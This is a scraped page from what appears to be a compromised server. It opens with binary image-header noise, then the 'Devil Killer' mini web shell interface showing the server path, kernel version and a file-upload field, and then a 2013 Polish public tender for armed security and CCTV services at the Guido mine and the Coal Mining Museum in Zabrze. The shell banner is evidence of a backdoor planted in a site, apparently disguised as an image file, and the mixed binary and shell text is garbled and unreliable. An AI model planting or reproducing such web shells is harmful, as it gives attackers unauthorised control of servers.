JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130129/38388-N-2013.html

<p class="kh_header"><b>Zabrze: Świadczenie usług ochrony osób i mienia obszarów należących do Zabytkowej Kopalni Węgla Kamiennego Guido w Zabrzu znajdujących się przy ul. 3 Maja 93 i 91, ul. Jodłowej 59 i ul. Miarki 8 w Zabrzu oraz należących do Muzeum Górnictwa Węglowego w Zabrzu znajdujących się przy ul. 3 Maja 19, ul. Wolności 410 i 408 oraz ul. Sienkiewicza 43 w Zabrzu</b><br>
<b>Numer ogłoszenia: 38388 - 2013; data zamieszczenia: 29.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zabytkowa Kopalnia Węgla Kamiennego "GUIDO" w Zabrzu , ul. 3 Maja 93, 41-800 Zabrze, woj. śląskie, tel. 0-32 271 40 77, faks 0-32 271 40 77 wew. 5518.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług ochrony osób i mienia obszarów należących do Zabytkowej Kopalni Węgla Kamiennego Guido w Zabrzu znajdujących się przy ul. 3 Maja 93 i 91, ul. Jodłowej 59 i ul. Miarki 8 w Zabrzu oraz należących do Muzeum Górnictwa Węglowego w Zabrzu znajdujących się przy ul. 3 Maja 19, ul. Wolności 410 i 408 oraz ul. Sienkiewicza 43 w Zabrzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest bezpośrednia ochrona osób i mienia, realizowana osobami posiadającymi licencję minimum I stopnia pracownika ochrony fizycznej, które - we wszystkich dokumentach dotyczących niniejszego zamówienia - zwane są dalej (pracownikami ochrony) (w rozumieniu Ustawy o ochronie osób i mienia - Dz. U. z 2005 r. Nr 145, poz. 1221,  z późn. zm.). 
Zamówienie obejmuje ochronę obszarów Zabytkowej Kopalni Węgla Kamiennego Guido w Zabrzu (Zadanie nr 1) oraz Muzeum Górnictwa Węglowego w Zabrzu (Zadanie nr 2) wraz ze znajdującymi się na nich obiektami i urządzeniami w okresie nie wcześniej niż 01.03.2013 r. do 31.05.2014 r., zgodnie z Ustawą o ochronie osób i mienia (Dz.U. z 2005 r. Nr 145, poz. 1221,  z późn. zm.), SIWZ, umową i załącznikami.

I.Ochrona fizyczna wraz z systemem telewizji przemysłowej (w wybranych obiektach)
Zadanie nr 1 - ochrona obszarów Zabytkowej Kopalni Węgla Kamiennego Guido w Zabrzu
A. Ochrona obszaru przy ul. 3 Maja 93 wykonywana poprzez:
- bezpośrednią ochronę fizyczną - stałą, realizowaną całodobowo (posterunek stały z obchodem), we wszystkie dni tygodnia - w godzinach od 22.00 do 6.00 dwuosobową, pracownik wyposażony w ręczny miotacz gazu (dopuszcza się wyposażenie w miotacz nie wymagający pozwolenia na broń), kajdanki, pałkę wielofunkcyjną typu tonfa, radiotelefon typu nasobnego i latarkę;
- zamontowanie na czas realizacji zamówienia, własnego systemu telewizji przemysłowej - wymagany obszar monitorowany wskazany w Załączniku nr 1 (mapa), utrzymanie tego systemu w sprawności oraz wykonywany przez pracownika ochrony obsadzającego posterunek stały dozór sygnałów z tego systemu i natychmiastowe reagowanie na uzyskiwane za jego pomocą informacje, 
- wykonywany przez pracownika stały dozór systemu przeciwpożarowego i natychmiastowe reagowanie na uzyskane za ich pomocą  informacje,
- bezpośrednia ochrona doraźna realizowana całodobowo, we wszystkie dni tygodnia, w formie 2 osobowej grupy interwencyjnej. Każdy pracownik ochrony, wchodzący w skład grupy interwencyjnej, wyposażony w uzbrojenie i środki przymusu bezpośredniego tj. broń (w rozumieniu art. 4 ust. 1 pkt. 1, 3, 4c ustawy o broni i amunicji (tekst jednolity Dz. U. z 24 maja 2012 roku, poz. 576), pałkę obronną wielofunkcyjną typu tonfa, kajdanki i latarkę. Grupa ma dysponować środkami łączności radiotelefonicznej i oznakowanym pojazdem. 

Obowiązki wynikające z ochrony imprez okolicznościowych i kulturalnych organizowanych na obszarze przy ul. 3 Maja 93:
1) Terminy imprez i ilość licencjonowanych pracowników niezbędnych do zabezpieczenia będą podawane z 5 dniowym wyprzedzeniem.
2) Pozostałe warunki w stosunku do pracowników ochrony jak w SIWZ.
3) w tym zakresie Zamawiający dopuszcza udział podwykonawców, pod warunkiem spełnienia wymagań w stosunku dla pracowników ochrony jak dla Wykonawcy m.in.:
- zapewnienie ochrony fizycznej pełnionej nieprzerwanie, w czasie trwania imprezy kulturalnej itp. przez pracowników ochrony posiadających licencję pracownika ochrony co najmniej pierwszego stopnia,
- jednolite, estetyczne ubiory służbowe umożliwiające identyfikację pracownika ochrony oraz zatrudniającej go firmy;
- identyfikatory imienne z aktualnymi zdjęciami oraz numerami aktualnej licencji;
- niezależna łączność radiotelefoniczna, wyposażeni w przenośny sprzęt niezbędny do skutecznego wykonywania obowiązków, jeżeli przewidziane i dopuszczone prawem.

B. Ochrona obszaru przy ul. Jodłowej 59 wykonywana poprzez:
- bezpośrednią ochronę fizyczną - stałą, jednoosobową, realizowaną całodobowo (posterunek stały z obchodem obiektu wraz przyległym terenem), we wszystkie dni tygodnia; pracownik wyposażony w ręczny miotacz gazu (dopuszcza się wyposażenie w miotacz nie wymagający pozwolenia na broń), kajdanki, pałkę wielofunkcyjną typu tonfa i latarkę;
- wykonywany przez pracownika stały dozór sygnałów z systemu telewizji przemysłowej, systemu alarmowego i systemu przeciwpożarowego i natychmiastowe reagowanie na uzyskane za ich pomocą  informacje (systemy te są własnością Zamawiającego, który dokona szkolenia Wykonawcy w zakresie ich działania),
- bezpośrednia ochrona doraźna realizowana całodobowo, we wszystkie dni tygodnia, w formie 2 osobowej grupy interwencyjnej. Każdy pracownik ochrony, wchodzący w skład grupy interwencyjnej, wyposażony w uzbrojenie i środki przymusu bezpośredniego tj. broń (w rozumieniu art. 4 ust. 1 pkt. 1, 3, 4c ustawy o broni i amunicji (tekst jednolity Dz. U. z 24 maja 2012 roku, poz. 576), pałkę obronną wielofunkcyjną typu tonfa, kajdanki i latarkę. Grupa ma dysponować środkami łączności radiotelefonicznej i oznakowanym pojazdem. 

C. Ochrona obszaru przy ul. Miarki 8 wykonywana poprzez:
- bezpośrednią ochronę fizyczną - stałą, jednoosobową, realizowaną całodobowo (posterunek stały z obchodem), we wszystkie dni tygodnia; pracownik wyposażony w ręczny miotacz gazu (dopuszcza się wyposażenie w miotacz nie wymagający pozwolenia na broń), kajdanki, pałkę wielofunkcyjną typu tonfa, radiotelefon typu nasobnego i latarkę;
- zamontowanie na czas realizacji zamówienia, własnego systemu telewizji przemysłowej  - wymagany obszar monitorowany wskazany w Załączniku nr 2 (mapa), utrzymanie tego systemu w sprawności oraz wykonywany przez pracownika ochrony obsadzającego posterunek stały dozór sygnałów z tego systemu i natychmiastowe reagowanie na uzyskane za jego pomocą informacje,
- wykonywany przez pracownika stały dozór systemu przeciwpożarowego i natychmiastowe reagowanie na uzyskane za ich pomocą  informacje,
- bezpośrednia ochrona doraźna realizowana całodobowo, we wszystkie dni tygodnia, w formie 2 osobowej grupy interwencyjnej. Każdy pracownik ochrony, wchodzący w skład grupy interwencyjnej, wyposażony w uzbrojenie i środki przymusu bezpośredniego tj. broń (w rozumieniu art. 4 ust. 1 pkt. 1, 3, 4c ustawy o broni i amunicji (tekst jednolity Dz. U. z 24 maja 2012 roku, poz. 576), pałkę obronną wielofunkcyjną typu tonfa, kajdanki i latarkę. Grupa ma dysponować środkami łączności radiotelefonicznej i oznakowanym pojazdem. 

Zadanie nr 2 - ochrona obszarów Muzeum Górnictwa Węglowego w Zabrzu
A. Ochrona obszaru przy ul. 3 Maja 19 wykonywana poprzez:
- bezpośrednią ochronę fizyczną stałą (całodobowy posterunek stały z obchodem, we wszystkie dni tygodnia) oraz doraźną (całodobowa grupa interwencyjna).  Posterunek stały obsadzony jednym pracownikiem ochrony wyposażonym w uzbrojenie, środki przymusu bezpośredniego oraz dodatkowe wyposażenie wymagane Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu tj. w paralizator elektryczny (wymagający zezwolenia na broń), pałkę  obronną  wielofunkcyjną typu tonfa, kajdanki i radiotelefon typu nasobnego. Ochrona doraźna realizowana w formie 2 osobowej grupy interwencyjnej. Każdy pracownik ochrony, wchodzący w skład grupy interwencyjnej, wyposażony w uzbrojenie i środki przymusu bezpośredniego wymagane Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu tj. w broń palną bojowa krótką z normatywem amunicji, pałkę obronną wielofunkcyjną typu tonfa i kajdanki. Oprócz tego wyposażona w środki łączności radiotelefonicznej i oznakowany pojazd.
- wykonywany przez pracownika stały dozór sygnałów z systemu telewizji przemysłowej oraz systemu przeciwpożarowego i natychmiastowe reagowanie na uzyskane za ich pomocą  informacje (systemy te są własnością Zamawiającego, który dokona szkolenia Wykonawcy w zakresie ich działania).

Uwaga: Usługa w w.w obszarze ma być realizowana zgodnie z Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu opatrzonym klauzulą tajności: Do użytku służbowego. Wymienione wyżej obszary (i znajdujące się na nich obiekty i urządzenia) umieszczone zostały Decyzją Nr ZO - IV - 5220 - 47-RS-2000 z 27 marca 2000 roku wicewojewody śląskiego, w ewidencji obiektów i urządzeń podlegających obowiązkowej ochronie.

B.	Ochrona obszaru przy ul. Wolności 408 i 410 wykonywana poprzez: 
- bezpośrednią ochronę fizyczną stałą (całodobowy posterunek stały z obchodem, we wszystkie dni tygodnia) oraz doraźną (całodobowa grupa interwencyjna).  Posterunek stały obsadzony jednym pracownikiem ochrony wyposażonym w uzbrojenie, środki przymusu bezpośredniego oraz dodatkowe wyposażenie wymagane Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu tj. w paralizator elektryczny (wymagający zezwolenia na broń), pałkę  obronną  wielofunkcyjną typu tonfa, kajdanki i radiotelefon typu nasobnego. Ochrona doraźna realizowana w formie 2 osobowej grupy interwencyjnej. Każdy pracownik ochrony, wchodzący w skład grupy interwencyjnej, wyposażony w uzbrojenie i środki przymusu bezpośredniego wymagane Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu tj. w broń palną bojowa krótką z normatywem amunicji, pałkę obronną wielofunkcyjną typu tonfa i kajdanki. Oprócz tego wyposażona w środki łączności radiotelefonicznej i oznakowany pojazd.

Uwaga: Usługa w w.w obszarze ma być realizowana zgodnie z Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu opatrzonym klauzulą tajności: Do użytku służbowego. Wymienione wyżej obszary (i znajdujące się na nich obiekty i urządzenia) umieszczone zostały Decyzją Nr ZO - IV - 5220 - 47-RS-2000 z 27 marca 2000 roku wicewojewody śląskiego, w ewidencji obiektów i urządzeń podlegających obowiązkowej ochronie.

C. Ochrona budynku Łaźni Łańcuszkowej wraz z przyległym terenem przy ul. Wolności 408 wykonywana poprzez:
- bezpośrednią ochronę fizyczną stałą (posterunek stały z obchodem, we wszystkie dni tygodnia, w godzinach od 22:00 do 6:00) oraz doraźną (grupa interwencyjna).  Posterunek stały obsadzony jednym pracownikiem ochrony wyposażonym w uzbrojenie, środki przymusu bezpośredniego oraz dodatkowe wyposażenie wymagane Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu tj. w paralizator elektryczny (wymagający zezwolenia na broń), pałkę  obronną  wielofunkcyjną typu tonfa, kajdanki i radiotelefon typu nasobnego. Ochrona doraźna realizowana w formie 2 osobowej grupy interwencyjnej. Każdy pracownik ochrony, wchodzący w skład grupy interwencyjnej, wyposażony w uzbrojenie i środki przymusu bezpośredniego wymagane Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu tj. w broń palną bojowa krótką z normatywem amunicji, pałkę obronną wielofunkcyjną typu tonfa i kajdanki. Oprócz tego wyposażona w środki łączności radiotelefonicznej i oznakowany pojazd.

Uwaga: Usługa w w.w obszarze ma być realizowana zgodnie z Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu opatrzonym klauzulą tajności: Do użytku służbowego. Wymienione wyżej obszary (i znajdujące się na nich obiekty i urządzenia) umieszczone zostały Decyzją Nr ZO - IV - 5220 - 47-RS-2000 z 27 marca 2000 roku wicewojewody śląskiego, w ewidencji obiektów i urządzeń podlegających obowiązkowej ochronie.
Zamawiający w związku z możliwością zmniejszenia ilości godzin ochrony na w.w obszarze, która może wyniknąć z przyczyn niezależnych od Zamawiającego zastrzega sobie możliwość nie wykupienia całej ilości zaplanowanych godzin ochrony na w.w obszarze, zaś Wykonawcy nie przysługują z tego tytułu żadne roszczenia względem Zamawiającego.

D. Ochrona obszaru przy ul. Sienkiewicza 43 wykonywana poprzez:
- bezpośrednią ochronę fizyczną stałą (całodobowy posterunek stały z obchodem, we wszystkie dni tygodnia) oraz doraźną (całodobowa grupa interwencyjna).  Posterunek stały obsadzony jednym pracownikiem ochrony wyposażonym w uzbrojenie, środki przymusu bezpośredniego oraz dodatkowe wyposażenie wymagane Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu tj. w paralizator elektryczny (wymagający zezwolenia na broń), pałkę  obronną  wielofunkcyjną typu tonfa, kajdanki i radiotelefon typu nasobnego. Ochrona doraźna realizowana w formie 2 osobowej grupy interwencyjnej. Każdy pracownik ochrony, wchodzący w skład grupy interwencyjnej, wyposażony w uzbrojenie i środki przymusu bezpośredniego wymagane Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu tj. w broń palną bojowa krótką z normatywem amunicji, pałkę obronną wielofunkcyjną typu tonfa i kajdanki. Oprócz tego wyposażona w środki łączności radiotelefonicznej i oznakowany pojazd.

Uwaga: Usługa w w.w obszarze ma być realizowana zgodnie z Planem ochrony obiektów Muzeum Górnictwa Węglowego w Zabrzu opatrzonym klauzulą tajności: Do użytku służbowego. Wymienione wyżej obszary (i znajdujące się na nich obiekty i urządzenia) umieszczone zostały Decyzją Nr ZO - IV - 5220 - 47-RS-2000 z 27 marca 2000 roku wicewojewody śląskiego, w ewidencji obiektów i urządzeń podlegających obowiązkowej ochronie.
Zamawiający w związku z możliwością zmniejszenia ilości godzin ochrony na w.w obszarze, która może wyniknąć z przyczyn niezależnych od Zamawiającego zastrzega sobie możliwość nie wykupienia całej ilości zaplanowanych godzin ochrony na w.w obszarze, zaś Wykonawcy nie przysługują z tego tytułu żadne roszczenia względem Zamawiającego.

II. Dodatkowe godziny ochrony
W ramach umowy zamawiający zamawia 1 500 roboczogodzin do wykorzystania przez Zamawiającego:
- terminy, ilość godzin, miejsce wykonywania ochrony oraz ilość licencjonowanych pracowników ochrony w ramach posiadanych roboczogodzin będą podawane z co najmniej 5 dniowym wyprzedzeniem.
- pozostałe warunki w stosunku do pracowników ochrony jak w stosunku do pracowników ochrony obsadzających posterunki stałe.
- obszar ochrony: w ramach niniejszego przedmiotu umowy.

Zamawiający w związku z możliwością zmniejszenia ilości godzin ochrony  w ramach w.w zamówienia, która może wyniknąć z przyczyn niezależnych od Zamawiającego zastrzega sobie możliwość nie wykupienia całej ilości zaplanowanych godzin ochrony na w.w obszarze, zaś Wykonawcy nie przysługują z tego tytułu żadne roszczenia względem Zamawiającego.

III. Inne czynności realizowane w ramach umowy oraz ustalonego umową wynagrodzenia:
1. Instrukcje i plany ochrony:
w ramach Zadania nr 1:
Wykonawca zobowiązany jest do opracowania instrukcji ochrony obszarów chronionych Zabytkowej Kopalni Węgla Kamiennego Guido w Zabrzu oraz - każdorazowo w razie potrzeby - do przygotowania jej aktualizacji. Aktualizację Wykonawca winien sporządzić do 21 dni od daty powzięcia wiadomości 
o konieczności jej dokonania.
w ramach Zadania nr 2:
Wykonawca zobowiązany jest do opracowania Planu ochrony obiektów Muzeum Górnictwa Węglowego 
w Zabrzu oraz - każdorazowo w razie potrzeby - do przygotowania jego aktualizacji. Aktualizację Wykonawca winien sporządzić do 21 dni od daty powzięcia wiadomości o konieczności jej dokonania, a następnie, w imieniu Zamawiającego, uzgodnić ją ze Śląskim Wojewódzkim Komendantem Policji w Katowicach. 

2. Pozostałe czynności realizowane przez pracowników ochrony:
- wydawanie i przyjmowanie kluczy do pomieszczeń przez pracowników ochrony,
- prowadzenie rejestru wydawania kluczy oraz rejestru firm przebywających w obiektach,
- oczyszczanie chodników i alejek z liści i innych zanieczyszczeń, a także chodników przyległych do posesji,
- odśnieżanie chodników i alejek, a także chodników przyległych do posesji,
- zamiatanie i odśnieżanie parkingu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Informacja o przewidywanych zamówieniach uzupełniających.
Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 Pzp.
a) Informacja o przewidywanych zamówieniach uzupełniających: 
- ochrona osób i mienia (w zakresie wynikającym z opisu zamówienia podstawowego).
Zakres zamówienia uzupełniającego zgodny z przedmiotem i kodami CPV:
- 79710000-4 usługi ochroniarskie,
- 92521200-1 usługi ochrony wystaw i eksponatów,
- 92522000-6 usługi ochrony obiektów i budynków historycznych,
- 92522100-7 usługi ochrony obiektów historycznych,
- 92522200-8 usługi ochrony budynków historycznych.
b) Okoliczności, po których zaistnieniu mogą być udzielane zamówienia uzupełniające:
- zwiększenie zagrożenia bezpieczeństwa na chronionych obszarach (faktyczne bądź potencjalne), 
- konieczność zamontowania większej ilości kamer ze względów bezpieczeństwa,
- konieczność organizacji dodatkowych imprez (ponad ilość godzin określoną w SIWZ).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 92.52.12.00-1, 92.52.20.00-6, 92.52.21.00-7, 92.52.22.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 13.000,00 PLN, (słownie trzynaście tysięcy złotych) zabezpieczającego ofertę na okres 30 dni.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania;
Aktualna koncesja na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia Ministra Spraw Wewnętrznych i Administracji wydana, na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jednolity Dz. U. z 2005 r.  145 poz.  1221 późn. zm.), na podjęcie działalności gospodarczej w zakresie usług ochrony osób i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia;
1. W okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych są również w trakcie wykonywania, usługę w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.:
a) jedną usługę o wartości nie mniejszej niż 200 000,00 zł brutto, polegającą na ochronie obiektu użyteczności publicznej lub obiektów użyteczności publicznej, realizowaną w formie bezpośredniej ochrony fizycznej stałej oraz doraźnej (grupa interwencyjna) oraz dostawie, montażu i obsłudze systemu telewizji przemysłowej. Usługa świadczona w sposób ciągły przez okres minimum jednego roku.
Uwaga.
Przez budynek użyteczności publicznej, zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie, należy rozumieć -budynek przeznaczony dla administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym lub wodnym, poczty lub telekomunikacji oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się  także budynek biurowy i socjalny.

Uwaga. 
Jeżeli zakres wykazanych i udokumentowanych usług jest szerszy niż wymagany przez Zamawiającego, Wykonawca winien w wykazie usług (Załącznik nr 3 wg Spisu zawartości oferty), wskazać wartość, przedmiot, daty wykonania i odbiorców, odpowiadających zakresowi przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;

1. Co najmniej 2 oznakowane pojazdy do używania przez grupy interwencyjne.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia, które będą uczestniczyć w wykonaniu zamówienia:
1) osoby posiadające licencję minimum I stopnia pracownika ochrony fizycznej oraz co najmniej roczne doświadczenie w ochronie obiektów - minimum 10 osób do bezpośredniej ochrony fizycznej stałej,
2) zmotoryzowany całodobowy patrol grupy interwencyjnej, wyposażony w łączność radiową z osobami sprawującymi bezpośrednią ochronę - minimum 4 osoby.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę nie mniejszą niż 400 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
